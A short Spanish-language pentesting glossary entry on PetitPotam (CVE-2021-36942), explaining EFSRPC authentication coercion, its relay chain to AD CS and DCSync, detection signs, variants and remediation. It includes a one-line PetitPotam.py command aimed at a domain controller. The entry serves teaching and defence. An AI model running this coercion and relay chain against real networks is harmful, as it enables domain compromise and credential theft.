> ## Documentation Index
> Fetch the complete documentation index at: https://rootea.es/llms.txt
> Use this file to discover all available pages before exploring further.

# PetitPotam (CVE-2021-36942)

> RPC EFSRPC (Encrypting File System Remote Protocol) permite forzar a un computer (DC incluido) a autenticarse contra una IP arbitraria.

# PetitPotam (CVE-2021-36942)

<p className="glossary-answer">RPC EFSRPC (Encrypting File System Remote Protocol) permite forzar a un computer (DC incluido) a autenticarse contra una IP arbitraria.</p>

**Categoría:** [Active Directory · Vectores avanzados](/glosario)

🎯 **Trinchera** — RPC `EFSRPC` (Encrypting File System Remote
Protocol) permite forzar a un computer (DC incluido) a autenticarse
contra una IP arbitraria. Coercion universal sin credenciales.

🔗 **Kill chain** — Variante moderna: **anonymous coercion** + relay
a AD CS HTTP (ESC8) → cert del DC\$ → DCSync.

📡 **Huella defensiva** — Conexiones SMB/HTTP desde DC\$ a IP atacante;
firmas en EDR; `EfsRpcOpenFileRaw` calls atípicas.

⚠️ **Falso amigo** — Microsoft parchó la versión anonymous, pero
sigue existiendo con credencial. Variantes: PrinterBug (MS-RPRN),
DFSCoerce (MS-DFSNM), MS-EFSRPC variantes.

🛡️ **Remediación** — KB5005413 + EPA en AD CS, deshabilitar HTTP
endpoints. Bloquear NTLM hacia AD CS desde DCs.

```bash theme={null}
PetitPotam.py -u attacker -p Pass -d corp.local 10.10.10.50 10.10.10.5
```

***

← [Volver al glosario completo](/glosario)

<script type="application/ld+json">
  {`{"@context":"https://schema.org","@type":"DefinedTerm","name":"PetitPotam (CVE-2021-36942)","description":"RPC EFSRPC (Encrypting File System Remote Protocol) permite forzar a un computer (DC incluido) a autenticarse contra una IP arbitraria.","inDefinedTermSet":{"@type":"DefinedTermSet","name":"Glosario táctico de pentesting","url":"https://rootea.es/glosario"},"url":"https://rootea.es/glosario/petitpotam-cve-2021-36942"}`}
</script>

<script type="application/ld+json">
  {`{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https://rootea.es"},{"@type":"ListItem","position":2,"name":"Glosario táctico","item":"https://rootea.es/glosario"},{"@type":"ListItem","position":3,"name":"PetitPotam (CVE-2021-36942)","item":"https://rootea.es/glosario/petitpotam-cve-2021-36942"}]}`}
</script>

*Última actualización: 2026-06-11*
